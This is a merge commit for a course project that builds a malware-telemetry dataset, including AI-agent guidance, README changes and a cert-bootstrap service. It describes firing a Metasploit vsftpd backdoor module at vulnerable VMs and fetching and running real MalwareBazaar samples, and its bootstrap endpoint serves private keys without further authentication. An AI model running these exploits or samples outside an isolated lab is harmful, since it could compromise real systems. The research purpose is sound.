Merge origin/main into Dev_REL1_043026; accept main's service files

Cherry-picks all upstream additions (fleet runner, full collector suite, shipper module, exploit driver, samples, scripts/, cis490_doctor, etc.) and resolves the two service-file conflicts by accepting main's production versions over the stubs we wrote on Day 1. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-04-30 15:05:51 -06:00 · 2026-04-30 15:05:51 -06:00 · 7683b64929
commit 7683b64929
parent 86fdd03de4 a61fa05980
71 changed files with 10477 additions and 214 deletions
--- a/AGENTS.md
+++ b/AGENTS.md
@ -0,0 +1,202 @@
+# AGENTS.md — guidance for AI agents working on this repo
+
+This project is part of the spectral lab (`http://maxgit.wg/spectral/`).
+The conventions below also apply to sibling repos (`wg-enroll`,
+`wg-pki`, `caddy`, `iptmonads`, `matrix`, `forgejo`, `vault`,
+`openclaw-deploy`).
+
+---
+
+## How a lab host gets to "shipping data" — the canonical bring-up
+
+If you (an AI agent OR a human) are looking at a fresh lab host and
+asking "is this thing actually generating data for the central
+collector?", run this in order. **Cloning the repo by itself does
+nothing. Running launchers from a manual clone bypasses the
+systemd services that do the actual work.**
+
+```sh
+# 0. (One-time, on the Pi only.) Initialize the CIS490 client CA + a
+#    leaf cert for THIS lab host. Get its WG IP from `wg-enroll-admin
+#    show <usb>` first.
+sudo /home/max/.env/wg-pki/scripts/init-cis490-client-ca.sh   # idempotent
+sudo /home/max/.env/wg-pki/scripts/deploy-cis490-cert.sh \
+     <host_id> <wg_ip>           # mints + scp's + extracts + chmods
+
+# 1. (On the lab host.) Install the lab-host role. This copies the
+#    repo into /opt/cis490, builds the venv, drops systemd units,
+#    fetches the Alpine baseline qcow2, and builds the cidata ISO
+#    with the in-guest agent embedded.
+sudo /opt/cis490/scripts/install-lab-host.sh
+# (or, if running from the manual clone:)
+#   sudo ./scripts/install-lab-host.sh
+
+# 2. Edit /etc/cis490/lab-host.toml — set host_id and any overrides.
+
+# 3. Verify everything before enabling the timer-driven services:
+/opt/cis490/.venv/bin/python /opt/cis490/tools/cis490_doctor.py \
+    --role lab-host
+# → green/yellow rows means READY; red rows print the exact fix
+#   command. Re-run until clean.
+
+# 4. Turn on the services. From this moment on, the orchestrator runs
+#    one fleet wave on each Restart= cycle, and the shipper picks up
+#    completed episodes and PUTs them to https://collector.wg over mTLS.
+sudo systemctl enable --now cis490-shipper cis490-orchestrator
+
+# 5. (On the Pi.) Watch the index grow:
+sudo tail -f /var/lib/cis490/index.jsonl
+
+# 6. (Optional, Tier 3.) Enable real exploit fire — needs metasploit.
+sudo /opt/cis490/scripts/install-msfrpcd.sh
+# Operator-supplied URL + sha256 (Rapid7 download is registration-walled):
+IMAGE_URL='…' IMAGE_SHA256='…' sudo OUT_DIR=/var/lib/cis490/vm/images \
+    /opt/cis490/scripts/fetch-metasploitable2.sh
+```
+
+If `index.jsonl` doesn't grow within a wave-interval (~60 s after
+`systemctl enable --now`), run `cis490-doctor` again. The most
+common silent failures it catches:
+
+- `*.wg` DNS missing (wg-enroll provisions it; manual workaround is
+  one line in `/etc/hosts`)
+- mTLS cert chain not installed under `/etc/cis490/certs/`
+- `cis490-shipper` service inactive (forgot step 4)
+- `qemu-system-x86_64` not on PATH
+
+`cis490-doctor --json` is machine-readable for use by other agents.
+
+## How an agent generates data on demand (without waiting for the timer)
+
+```sh
+# One labeled episode (90 s) with a chosen sample profile:
+sudo -u cis490 /opt/cis490/.venv/bin/python \
+    /opt/cis490/tools/run_real_vm_demo.py \
+    --data-root /var/lib/cis490/data \
+    --sample mirai-class-bot
+
+# Force the shipper to run one pass:
+sudo systemctl start cis490-shipper.service   # (if disabled)
+# or:
+sudo -u cis490 /opt/cis490/.venv/bin/python -m shipper \
+    --config /etc/cis490/lab-host.toml --once
+
+# Confirm on the Pi:
+ssh <pi> 'sudo tail -3 /var/lib/cis490/index.jsonl'
+```
+
+Any tool that wants to *count* what's been shipped:
+
+```sh
+ssh <pi> 'sudo /opt/cis490/.venv/bin/python /opt/cis490/tools/index_reader.py \
+    --index /var/lib/cis490/index.jsonl --count-by host_id'
+```
+
+## Quick test for "is the pipe alive at all"
+
+The `--ping` mode of the shipper does an authenticated POST to
+`/v1/ping` and writes nothing to the database. Use it as the
+smallest E2E test:
+
+```sh
+sudo -u cis490 /opt/cis490/.venv/bin/python -m shipper \
+    --config /etc/cis490/lab-host.toml --ping
+# {"ok": true, "status_code": 200, ...} on success.
+# Any other status is the operator's signal to read the error string.
+```
+
+---
+
+## File an issue when you hit a problem
+
+**When you run into an issue you cannot fully resolve in the current
+turn, file it as a Forgejo issue on the relevant repo before moving
+on.** Do not silently log a TODO comment, leave a partial workaround,
+or assume someone else will remember. The issue tracker is the
+durable record.
+
+This applies to:
+
+- a build / test / typecheck failure you can't fix in scope
+- a bug you discover but aren't tasked with fixing
+- a missing dep, missing config, or env-only failure that blocks E2E
+- a design gap you've worked around but want a follow-up to fix
+  properly
+- a scope-out you made (e.g. "deferred Tier 4 sample fetch") that
+  needs an owner so it doesn't get lost
+
+Don't file an issue when:
+
+- the user is in the conversation and you can just *tell* them
+- it's already filed (search first: `GET /api/v1/repos/<owner>/<repo>/issues?state=open&q=<keyword>`)
+- it's truly a non-issue (a one-line edit you're about to make this
+  same turn)
+
+## How to file (Forgejo API)
+
+The local Forgejo at `http://10.100.0.1:3000` accepts API calls with a
+token-bearer header:
+
+```sh
+curl -s -X POST \
+  -H "Authorization: token <TOKEN>" \
+  -H "Content-Type: application/json" \
+  http://10.100.0.1:3000/api/v1/repos/spectral/<repo>/issues \
+  -d '{
+    "title": "<short, action-oriented title>",
+    "body":  "<context, repro, attempted fixes, suggested next step>"
+  }'
+```
+
+The token comes from the user's session — never embed one in code or
+commits.
+
+### What a good issue body contains
+
+1. **Context** — one sentence on what was being attempted.
+2. **What happened** — the actual error, log line, or unexpected
+   behavior. Paste exact output.
+3. **What was tried** — every workaround you attempted and why it
+   didn't stick.
+4. **Suggested next step** — the smallest change that would resolve
+   it, if you have a guess. "Unknown" is a fine answer.
+5. **Related** — link the commit / PR / file:line where the issue
+   surfaced.
+
+### What a good title looks like
+
+| Bad | Good |
+|---|---|
+| `tests broken` | `tests/test_episode.py: race when t_mono_origin_ns is set in run() not __init__` |
+| `caddy thing` | `Caddy: client_auth requires absolute path; relative trusted_ca_cert_file silently fails` |
+| `fix later` | `shipper: 5xx backoff cap is 5min, doc says 1min — pick one` |
+
+## After filing
+
+- Reference the issue number in the next commit message:
+  `Refs spectral/<repo>#<n>` or `Closes spectral/<repo>#<n>` if your
+  current change actually fixes it.
+- If the issue is on a different repo than the one you're committing
+  to, fully qualify: `spectral/wg-pki#3`.
+
+## Other conventions
+
+- **Don't put off the hard parts.** Frame "deferred-with-reason" only
+  for genuine blockers (binary not present on this machine, external
+  service unreachable). For anything you *could* do but find awkward
+  — bridge setup, cross-arch quirks, fleet concurrency — do it. The
+  user has flagged this twice when work was scoped down prematurely.
+  When something genuinely is blocked by an operator artifact, file
+  the Forgejo issue and *automate the bring-up* (e.g., installer
+  script + sha256-verifying fetcher) so the moment the artifact lands
+  it Just Works.
+- **Naming:** never coin USB / device / service names on the user's
+  behalf. Ask first. Reusing an old name is especially bad.
+- **`/etc` configs:** `Read` first, copy second. Never overwrite a
+  `/etc/...` file from a template without checking what's actually
+  there.
+- **wg-enroll scope:** creation-only. Don't add admin /
+  service-activation features to it.
+- **Don't expand a project's binary name beyond its own boundary:**
+  `openclaw` is the queue/permissions binary in `openclaw-deploy`.
+  This repo is `wg-enroll` (or its caller). Don't conflate.
--- a/README.md
+++ b/README.md
@ -4,9 +4,16 @@ Course project for CIS490 (Cybersecurity). The end-goal is an ML model that
 watches performance metrics on a real device, decides whether the device has
 been breached, and triggers a hardware-level reset when confidence is high
 enough. This repository covers the **dataset side** — we run public malware
-samples against intentionally vulnerable Linux VMs and capture labeled
-time-series telemetry that mirrors what the deployed model would see in the
-field.
+samples (and behavior-matched mimics) against intentionally vulnerable Linux
+VMs and capture labeled time-series telemetry that mirrors what the deployed
+model would see in the field.
+
+Concretely, every lab host on the WireGuard mesh detects how much capacity
+it has, spins up that many concurrent VMs, gives each VM a *different*
+malware profile from the manifest, and ships the resulting labeled episode
+tarballs to the central receiver on the Pi over mTLS. Running the same
+fleet on multiple hosts gives novel, non-overlapping data per host with no
+coordinator — see [Multi-host fleet](#multi-host-fleet) below.

 The work is grounded in the trust-over-time scoring model from
 [IEEE 9881803](https://ieeexplore.ieee.org/document/9881803).
@ -22,15 +29,33 @@ the set of timestamped phase transitions written to `labels.jsonl` —
 sharing a monotonic clock with the metric rows so anything aligned in
 time can be aligned in code.

-### Tier 2 — *real Alpine VM, real workload driven from inside the guest*
+### Tier 2 — *real Alpine VM, profile-driven workload inside the guest*

 This is the closest we get to real-malware behaviour without yet running
 real malware. Telemetry is real `/proc/<qemu_pid>` from outside the
-guest, **and the load is generated inside the guest** by busybox
-``yes`` (CPU saturation) and ``dd`` (disk bursts), driven over the
-serial console by `tools/vm_load_controller.py`. Every phase transition
-in `labels.jsonl` corresponds to an actual command issued inside the
-real VM.
+guest plus three more sources running concurrently (QMP, bridge pcap,
+in-guest agent — see *Telemetry sources* below). The *load* itself is
+generated inside the guest by a profile-matched shell command from
+[`exploits/workloads.py`](exploits/workloads.py), driven over the
+serial console by [`tools/vm_load_controller.py`](tools/vm_load_controller.py).
+
+Each sample's `profile` (from [`samples/manifest.toml`](samples/manifest.toml))
+dispatches to a different in-session workload, so the envelope each
+VM produces is observably different per family — exactly the variance
+the ML model needs to learn:
+
+| profile          | shape                                                  |
+|------------------|--------------------------------------------------------|
+| `cpu-saturate`   | sustained 1-vCPU saturation (XMRig)                    |
+| `scan-and-dial`  | SYN-style probes across the bridge subnet + dial-home  |
+| `io-walk`        | fs traversal + 4 KiB urandom writes (ransomware)       |
+| `bursty-c2`      | long idle + periodic 3-packet egress burst (Dridex)    |
+| `low-and-slow`   | minimal CPU + periodic memory churn (Kovter / fileless)|
+| `shell-resident` | one long-lived TCP socket + periodic command ticks (RAT)|
+
+Every phase transition in `labels.jsonl` corresponds to an actual
+command issued inside the real VM, and `meta.json` records which
+sample / profile / kind drove it.

 ![Real Alpine VM envelope](docs/images/real-vm-envelope.png)

@ -41,10 +66,20 @@ controller killing the load process inside the VM. The
 infected_running → dormant → infected_running re-entry is the textbook
 envelope that justifies the whole project framing.

-Reproduce with:
+Reproduce one episode (profile-driven via `--sample` or `SAMPLE_NAME`
+env, defaults to the v1 yes-loop without one):

 ```sh
-uv run python tools/run_real_vm_demo.py --data-root data
+uv run python tools/run_real_vm_demo.py --data-root data \
+    --sample xmrig-cryptominer
+```
+
+Or run the **fleet** — one wave of `max_concurrent` parallel episodes,
+each slot pulling a different sample from the manifest:
+
+```sh
+uv run python tools/run_fleet.py --capacity            # see what the host can do
+uv run python tools/run_fleet.py --waves 1 --data-root data
 ```

 ### Tier 1 — *real Alpine VM, idle baseline*
@ -67,14 +102,68 @@ above produces from real KVM behaviour.

 ![Synthetic envelope (host-side mimic)](docs/images/synthetic-envelope.png)

-### What's still missing for the real-malware envelope
+### Tier 3 — *real exploit fire, profile-matched workload (Driver v2)*
+
+The Tier-3 driver lives in [`exploits/`](exploits/README.md) — a tiny
+msgpack-over-HTTPS msfrpc client + `MSFExploitDriver`. With a
+[`Sample`](samples/manifest.py) supplied, the driver dispatches the
+post-exploit `infected_running` workload through
+[`exploits/workloads.py`](exploits/workloads.py) — same six profiles
+as Tier 2, so a fleet wave produces matched envelopes whether or not
+an exploit fires. Without a sample, the v1 yes-loop path is preserved
+for smoke runs.
+
+First canned module: `exploits/modules/vsftpd_234_backdoor.toml`
+(Metasploitable2's CVE-2011-2523). [`scripts/install-msfrpcd.sh`](scripts/install-msfrpcd.sh)
+sets up `msfrpcd` (loopback only) as a hardened systemd unit;
+[`scripts/fetch-metasploitable2.sh`](scripts/fetch-metasploitable2.sh)
+pulls + sha256-verifies a target image from operator-supplied URL.
+
+### Tier 4 — *real malware sample, fetched + uploaded + executed*
+
+A manifest entry with a `sha256` flips its `Sample.kind` to `"real"`.
+The driver then bypasses the mimic profile and runs the real-binary
+path:
+
+1. [`tools/fetch_sample.py <sha256>`](tools/fetch_sample.py) pulls the
+   binary from MalwareBazaar (Auth-Key from
+   `samples/.bazaar.token` or `MALWAREBAZAAR_API_KEY`), unzips with the
+   standard `infected` password, sha-verifies, and lands at
+   `samples/store/<sha256>` (gitignored).
+2. At `infected_running`, the driver chunked-uploads the binary into
+   the shell session as 8 KiB base64 segments
+   (`exploits.workloads.chunked_real_binary_upload`). 256 KiB binaries
+   work without buffer-busting msfrpc.
+3. The session decodes, sha-verifies *again on the guest side*, chmods,
+   and execs only if the hash matches. Mismatch fail-stops the run.
+4. `meta.sample.sha256` + per-step events
+   (`real_binary_upload_begin`, `real_binary_verify`,
+   `sample_executed{kind=real}`) record exactly which binary was run
+   and when, so trainers can join cleanly.
+
+### Tier maturity

 | Tier | What it gives | Status |
 |---|---|---|
-| 1 — real VM, idle | confidence the collector reads real KVM behaviour | ✅ done |
-| 2 — real VM, real workload from inside the guest | first real-load envelope shape | ✅ done |
-| 3 — real VM, real exploit fire (Metasploitable + msfrpc) | honest `armed → infecting` transitions | 🚧 |
-| 4 — real VM, real malware sample (XMRig from MalwareBazaar) | the full envelope we ultimately train on | 🚧 |
+| 1 — real VM, idle | confidence the collectors read real KVM behaviour | ✅ done |
+| 2 — real VM, profile-driven workload | distinguishable in-guest envelopes per malware family | ✅ done |
+| 3 — real VM, real exploit fire + profile workload | honest `armed → infecting` transitions, driver v2 dispatch | ✅ code; ⏳ awaiting Metasploitable2 image + msfrpcd on a lab host |
+| 4 — real VM, real malware sample (MalwareBazaar fetch) | the full envelope we ultimately train on | ✅ code; ⏳ awaiting MalwareBazaar API key + sha256s in manifest |
+
+### Telemetry sources (all five wire into one episode dir)
+
+| # | Source                         | Vantage       | Role                |
+|---|--------------------------------|---------------|---------------------|
+| 1 | host `/proc/<qemu_pid>`        | outside       | oracle (label only) |
+| 2 | QEMU QMP queries               | outside       | oracle (label only) |
+| 3 | `perf stat -p <qemu_pid>`      | outside       | oracle (label only) |
+| 4 | Bridge pcap → 100 ms netflow   | gateway-side  | feature (deployable)|
+| 5 | In-guest agent (virtio-serial) | inside        | feature (deployable)|
+
+All five are live. The deploy/oracle split follows
+[`docs/threat-model.md`](docs/threat-model.md): only sources 4 + 5
+are usable as model *features* in the field — sources 1, 2, 3 exist
+as labeling oracles only.

 For an interactive view of any episode (zoom/pan/hover), run:

@ -85,83 +174,135 @@ tools/show_envelope.sh data/episodes/<episode_id>

 ---

-## Status
+## Status (106/106 tests passing as of `a88ac83`)

- ✅ Receiver (HTTPS PUT, sha256-verified, idempotent) — tested with httpx + curl
- ✅ Orchestrator v0 — single- and scheduled-phase modes, ULID episode ids
- ✅ Host /proc oracle collector (source 1 of 5) at 10 Hz
- ✅ Synthetic envelope demo — full 8-phase envelope produced end-to-end
- ✅ Real VM (Alpine 3.21 cloud-init under KVM) — orchestrator collects against the real `qemu-system` pid
- ✅ **Tier 2 — real VM, real workload:** serial-console-driven load controller fires `yes`/`dd` inside the guest at every phase transition
- 🚧 QMP collector (source 2), bridge pcap collector (source 4), in-guest agent (source 5)
- 🚧 Exploit driver (Metasploit RPC) for `armed → infecting` transitions on `session_open`
- 🚧 Shipper (the third leg of the WG pipeline — receiver and orchestrator already verified)
+**Pipeline (lab-host → Pi → tarball stored)**
+- ✅ Receiver app (HTTPS PUT, sha256-verified, idempotent) — running on the Pi behind Caddy with mTLS via the wg-pki client CA
+- ✅ `POST /v1/ping` smoke endpoint (writes nothing, exercises the full auth path)
+- ✅ Shipper (`shipper/`) — tar+zstd, retry/backoff, `--ping` mode
+- ✅ Caddy `collector.wg` block (in `spectral/caddy`)
+- ✅ Lab-host install script + systemd units (`scripts/install-lab-host.sh`, `etc/cis490-{shipper,orchestrator}.service`)
+- ✅ Receiver install script (`scripts/install-receiver.sh`)
+- ✅ wg-pki client-CA bootstrap + per-host leaf issuance (in `spectral/wg-pki`)

-> **Topology note:** in this project the **Pi5 is the WireGuard-side
-> *collector*** that receives episode tarballs from one or more lab hosts.
-> It is *not* the deployment target for the model. The deployment target is
-> generic ("any constrained Linux device"). See
+**Telemetry**
+- ✅ Source 1 — host `/proc/<qemu_pid>` @ 10 Hz
+- ✅ Source 2 — QEMU QMP @ 1 Hz
+- ✅ Source 3 — `perf stat -p <qemu_pid>` (opt-in via `enable_perf`; needs `CAP_SYS_ADMIN` / `CAP_PERFMON`)
+- ✅ Source 4 — bridge pcap + 100 ms netflow bucketizer (pure-Python parser, no scapy/dpkt dep), wired into `EpisodeRunner` via `bridge_iface`
+- ✅ Source 5 — in-guest agent over virtio-serial; cidata-embedded for first-boot install on Alpine
+
+**Orchestrator + drivers**
+- ✅ Orchestrator v0 — phase-scheduled episode runner, ULID episode ids
+- ✅ Snapshot/revert via QMP `loadvm` (`revert_at_start` / `revert_at_end`) for clean baselines between episodes
+- ✅ Tier 2 driver — real Alpine VM, profile-driven in-guest workload over serial console
+- ✅ Tier 3 driver v2 — `MSFExploitDriver` + msfrpc client + per-sample workload dispatch; first canned module `vsftpd_234_backdoor.toml`
+- ✅ Tier 4 — `tools/fetch_sample.py` (MalwareBazaar by sha256) + chunked real-binary upload (`exploits.workloads.chunked_real_binary_upload`) + guest-side sha-verify-then-exec dispatch in `MSFExploitDriver`
+- ⏳ Tier 3 integration — needs operator to drop a Metasploitable2 image + run `scripts/install-msfrpcd.sh` on a lab host
+- ⏳ Tier 4 integration — needs operator's MalwareBazaar API key + at least one `sha256` entry in `samples/manifest.toml`
+
+**Fleet (multi-VM, multi-host data generation)**
+- ✅ Resource-aware capacity detector (cores / RAM / load) — `orchestrator/fleet.py`
+- ✅ Concurrent slot runner — `tools/run_fleet.py`
+- ✅ Sample manifest with six behavioural profiles + deterministic per-(host_id, slot, episode) selection so every host walks the catalog in a different order
+
+> **Topology note:** the **Pi5 is the WireGuard-side *collector*** that
+> receives episode tarballs from one or more lab hosts. It is *not* the
+> deployment target for the model. The deployment target is generic
+> ("any constrained Linux device"). See
 > [`docs/architecture.md`](docs/architecture.md).

 ---

 <details>
-<summary><b>Quick start — run the synthetic envelope demo (~90 s)</b></summary>
+<summary><b>Quick start — fleet mode (the primary workflow)</b></summary>

 ```sh
 git clone https://maxgit.wg/spectral/CIS490.git
 cd CIS490
-
-# One-time setup.
 uv sync

-# Generate one labeled episode (8 phases, 851 telemetry rows, 85 s).
-uv run python tools/run_envelope_demo.py --data-root data
+# 1. Build the cidata ISO with the in-guest agent baked in.
+uv run python tools/build_cidata.py vm/images/cidata.iso

-# Render a static PNG envelope of that episode.
-uv run python tools/plot_envelope.py data/episodes/<episode_id>
+# 2. See what this host is sized for.
+uv run python tools/run_fleet.py --capacity
+# cores: 4 (reserve 1)
+# ram:   7951 MiB total, 5223 MiB available (headroom 1024 MiB, per-vm 320 MiB)
+# load:  1m=0.51
+# caps:  by_cores=3, by_ram=13, by_load=3
+# --> max_concurrent VMs: 3

-# Or open an interactive plot in your browser:
+# 3. Run one wave (= max_concurrent parallel episodes, each with a
+#    different sample profile).
+uv run python tools/run_fleet.py --waves 1 --data-root data
+
+# 4. Plot any episode (matplotlib WebAgg).
 tools/show_envelope.sh data/episodes/<episode_id>
 ```

-The data lands in `data/episodes/<ulid>/`:
+Each episode dir contains:

 ```
-meta.json              episode metadata (image, snapshot, schedule, host fingerprint)
-events.jsonl           orchestrator actions (snapshot_load, phase_transition, episode_end)
+meta.json              episode metadata (image, sample, profile, fleet capacity)
+events.jsonl           orchestrator + driver events (exploit_fire, session_open, sample_executed, ...)
 labels.jsonl           one row per phase transition — THIS is the envelope
-telemetry-proc.jsonl   host /proc sampler at 10 Hz
+telemetry-proc.jsonl   source 1: host /proc sampler @ 10 Hz
+telemetry-qmp.jsonl    source 2: QMP query-status / blockstats / kvm stats @ 1 Hz
+telemetry-guest.jsonl  source 5: in-guest agent (CPU jiffies, mem, listen ports, top procs)
+network.pcap           source 4: tcpdump on br-malware
+netflow.jsonl          source 4: 100 ms-bucketed pcap aggregation
 done.marker            written last; the shipper only sees finished episodes
 ```

 </details>

 <details>
-<summary><b>Quick start — boot a real Linux VM (Cirros)</b></summary>
-
-The phase-2 launcher boots a Cirros qcow2 under KVM and exposes its
-QMP/monitor sockets and pidfile. The orchestrator then samples the real
-`qemu-system` process.
+<summary><b>Quick start — single episode, no fleet</b></summary>

 ```sh
-# Pre-staged: vm/images/cirros-baseline.qcow2 with snapshot 'baseline-v1'.
-# (See docs/sources.md for the Cirros sha256.)
+# Tier 2 (no exploit, profile-driven workload):
+uv run python tools/run_real_vm_demo.py --data-root data \
+    --sample mirai-class-bot

-# Boot in one terminal:
-RUN_DIR=/tmp/cis490-vm vm/launch_demo.sh
-
-# In another terminal, point the orchestrator at the VM's pid:
-QPID=$(cat /tmp/cis490-vm/qemu.pid)
-uv run python -m orchestrator --target-pid $QPID --duration 20
-
-# Plot:
-tools/show_envelope.sh data/episodes/<episode_id>
+# Tier 3 (real exploit fire via msfrpcd):
+MSFRPC_PASSWORD=$(. /etc/cis490/msfrpc.env; echo $MSFRPC_PASSWORD) \
+    uv run python tools/run_tier3_demo.py \
+    --module vsftpd_234_backdoor \
+    --sample ransomware-mimic \
+    --data-root data
 ```

-The idle-VM envelope shape is distinct from the synthetic load: periodic
-~10% CPU spikes from KVM/timer interrupts, flat ~230 MiB RSS, a single
-late-boot disk write. That's a real KVM guest you're seeing.
+</details>
+
+<details>
+<summary><b>Multi-host fleet — how cross-host diversity works</b></summary>
+
+Each lab host's `host_id` (set in `/etc/cis490/lab-host.toml`) seeds a
+deterministic walk through the sample catalog:
+
+```python
+# samples/manifest.py
+def select(self, *, host_id, slot, episode_index):
+    seed = f"{host_id}|{slot}|{episode_index}"
+    idx  = sha256(seed)[:8] % len(self.samples)
+    return self.samples[idx]
+```
+
+So:
+- `host=alice slot=0 ep=0` and `host=bob slot=0 ep=0` almost certainly
+  pick *different* samples (test asserts < 25% collision over 20 trials).
+- A single host walks the entire catalog within ~`len(manifest)` waves
+  (test confirms full coverage in 200 episodes).
+- No coordinator needed — every host independently produces non-overlapping
+  data, and `meta.fleet.host_id` + `meta.sample.name` make the join trivial
+  at training time.
+
+The fleet runner shells out to the same `tools/run_real_vm_demo.py` per
+slot, with `SLOT` / `RUN_DIR` / `SAMPLE_NAME` env passed through to the
+launcher. Each VM gets its own QMP socket, agent socket, hostfwd port
+range, and episode dir, so concurrency is collision-free up to the
+capacity ceiling.

 </details>

@ -177,15 +318,18 @@ late-boot disk write. That's a real KVM guest you're seeing.
 | [`docs/deploy.md`](docs/deploy.md) | One-command install for the lab-host and receiver roles |
 | [`docs/lab-setup.md`](docs/lab-setup.md) | KVM prereqs, VM build, snapshot, virtio-serial wiring |
 | [`docs/sources.md`](docs/sources.md) | Works cited — every tool, dep, sample source, paper, and standard |
-| `orchestrator/` | State machine that drives the boot → arm → detonate → observe → revert loop |
-| `collectors/` | One module per telemetry source (host /proc, QMP, perf, pcap, guest agent) |
-| `receiver/` | Starlette app: PUT /v1/episodes ingest, sha256-verified, idempotent |
-| `vm/` | qcow2 images, launch scripts, snapshot recipes (binaries gitignored) |
-| `tools/` | Demo runners, load mimic, plot scripts |
-| `exploits/` | Metasploit resource scripts for repeatable exploitation (TODO) |
-| `samples/` | Sample manifest (sha256-pinned). **Binaries never committed.** |
+| `orchestrator/` | Episode runner + `fleet.py` (capacity detection, concurrent slot driver) |
+| `collectors/` | One module per telemetry source: `proc_qemu`, `qmp`, `pcap`, `guest_agent` |
+| `receiver/` | Starlette app: PUT `/v1/episodes` + POST `/v1/ping`, sha256-verified, idempotent |
+| `shipper/` | Lab-host-side: scan `data/episodes/`, tar+zstd, PUT over mTLS, retry/backoff |
+| `vm/` | Launch scripts (`launch_demo.sh`, `launch_target.sh`), `setup_bridge.sh`, in-guest agent at `vm/guest-agent/cis490_agent.py`. qcow2 images and pcap captures gitignored. |
+| `tools/` | `run_fleet.py`, `run_real_vm_demo.py`, `run_tier3_demo.py`, `build_cidata.py`, `plot_envelope.py`, `show_envelope.sh` |
+| [`exploits/`](exploits/README.md) | MSF RPC client (`msfrpc.py`), `driver.py` (v2 with sample dispatch), `workloads.py` (six profile-matched in-session loops), per-module TOML configs |
+| [`samples/`](samples/manifest.toml) | Sample manifest + loader. Binaries land at `samples/store/<sha256>` (gitignored). |
+| `scripts/` | `install-{lab-host,receiver,msfrpcd}.sh`, `fetch-metasploitable2.sh` |
 | `training/` | Model training code (deferred — schema first) |
-| `etc/` | systemd units and config templates installed by the deploy scripts |
+| `etc/` | systemd units and config templates (`cis490-{receiver,shipper,orchestrator}.service`, `lab-host.toml.example`, `receiver.toml.example`) |
+| [`AGENTS.md`](AGENTS.md) | Conventions for AI agents working on this and sibling spectral repos |

 </details>

@ -226,17 +370,26 @@ Two roles, one bootstrap command each. Detailed in
  `index.jsonl`. Runs on the Pi5 in our setup.

 ```sh
-# On a lab host:
-./scripts/install-lab-host.sh   # (TODO — currently bring up by hand per docs/deploy.md)
-
 # On the Pi5 (or any always-on WG node):
-./scripts/install-receiver.sh   # (TODO — same)
+sudo ./scripts/install-receiver.sh
+# Add the collector.wg block to spectral/caddy (already merged), then:
+sudo systemctl enable --now cis490-receiver
+
+# One-time, on the Pi: bootstrap the CIS490 client CA.
+sudo /home/max/.env/wg-pki/scripts/init-cis490-client-ca.sh
+
+# On each lab host: enroll via wg-enroll first, then:
+sudo ./scripts/install-lab-host.sh
+# Drop a TLS leaf from wg-pki at /etc/cis490/certs/, edit /etc/cis490/lab-host.toml.
+sudo systemctl enable --now cis490-shipper cis490-orchestrator
 ```

-For now both bootstrap scripts are scaffolds; the units and configs they
-install live in `etc/`. The receiver itself works today
-(`uv run python -m receiver --config etc/receiver.toml.example` — modify
-paths).
+The orchestrator service runs `tools/run_fleet.py --waves 1` per
+invocation with `Restart=always`, giving a continuous stream of
+fresh-sample episodes per host. The shipper picks them up as
+`done.marker` files appear and PUTs them to `https://collector.wg`.
+
+For mTLS leaf-cert minting: `spectral/wg-pki/scripts/issue-cis490-client-cert.sh <host_id>`.

 </details>

--- a/bootstrap/init.py
+++ b/bootstrap/init.py
--- a/bootstrap/main.py
+++ b/bootstrap/main.py
@ -0,0 +1,65 @@
+"""``cis490-bootstrap`` launcher.
+
+Runs as root (needs CA private key access). Listens on 127.0.0.1:8446
+behind Caddy's ``bootstrap.wg`` site — Caddy terminates TLS, this
+service speaks plain HTTP on loopback only.
+"""
+
+from __future__ import annotations
+
+import argparse
+import logging
+import sys
+from pathlib import Path
+
+import uvicorn
+
+from bootstrap.app import make_app
+
+
+def main(argv: list[str] | None = None) -> int:
+    p = argparse.ArgumentParser(prog="cis490-bootstrap")
+    p.add_argument("--listen-host", default="127.0.0.1")
+    p.add_argument("--listen-port", type=int, default=8446)
+    p.add_argument(
+        "--issuer-script",
+        type=Path,
+        default=Path("/home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh"),
+        help="Path to the wg-pki leaf-cert mint script.",
+    )
+    p.add_argument(
+        "--issued-root",
+        type=Path,
+        default=Path("/home/max/.env/wg-pki/issued"),
+        help="Where minted tarballs are cached.",
+    )
+    p.add_argument("--log-level", default="info")
+    args = p.parse_args(argv)
+
+    logging.basicConfig(
+        level=getattr(logging, args.log_level.upper(), logging.INFO),
+        format="%(asctime)s %(levelname)s %(name)s %(message)s",
+    )
+    log = logging.getLogger("cis490.bootstrap.main")
+
+    if not args.issuer_script.exists():
+        log.error("issuer script missing: %s", args.issuer_script)
+        return 2
+
+    app = make_app(
+        issuer_script=args.issuer_script,
+        issued_root=args.issued_root,
+    )
+    log.info("listening on %s:%d", args.listen_host, args.listen_port)
+    uvicorn.run(
+        app,
+        host=args.listen_host,
+        port=args.listen_port,
+        log_level=args.log_level,
+        access_log=True,
+    )
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
--- a/bootstrap/app.py
+++ b/bootstrap/app.py
@ -0,0 +1,146 @@
+"""``cis490-bootstrap`` — auto-issue mTLS leaf certs to enrolled lab hosts.
+
+This is the chicken-and-egg fix for first-time lab-host setup. A
+freshly wg-enrolled device has WG access (and trusts the wg-pki CA)
+but has no client cert yet, so it can't authenticate to the
+mTLS-protected ``collector.wg``. This service exposes a *plain-TLS*
+(no client-auth) endpoint that the lab host can call once during
+``install-lab-host.sh`` to retrieve its leaf cert tarball.
+
+Trust boundary: anything that reaches ``bootstrap.wg`` has already
+passed iptmonads' WG-membership check at L4. No further
+authentication is required for the bootstrap pull — by the time a
+caller can connect at all they're a peer the operator authorized.
+
+The privilege boundary, on the other hand, is real: minting certs
+requires the wg-pki CA private key (root-only at
+``/var/lib/wg-pki/cis490-client-ca/ca.key``). This service therefore
+runs as root in a tight sandbox (see ``etc/cis490-bootstrap.service``)
+and shells out to ``issue-cis490-client-cert.sh`` for each mint.
+
+Endpoints:
+
+  GET /v1/cert/{host_id}   — return tarball of {ca.crt, leaf.pem, leaf.key}
+                             for ``host_id``. Cached — successive calls
+                             return the same bytes.
+  GET /v1/health           — liveness probe (no auth needed).
+
+Each mint is logged with the source IP (after Caddy's X-Real-IP
+forward) so the operator has an audit trail of which devices have
+fetched which certs.
+"""
+
+from __future__ import annotations
+
+import logging
+import re
+import subprocess
+import time
+from pathlib import Path
+from typing import Awaitable, Callable
+
+from starlette.applications import Starlette
+from starlette.requests import Request
+from starlette.responses import FileResponse, JSONResponse, Response
+from starlette.routing import Route
+
+
+log = logging.getLogger("cis490.bootstrap")
+
+
+# Sane host_id charset — same rules the receiver enforces, mirrored
+# here so mint requests can't smuggle path traversal in.
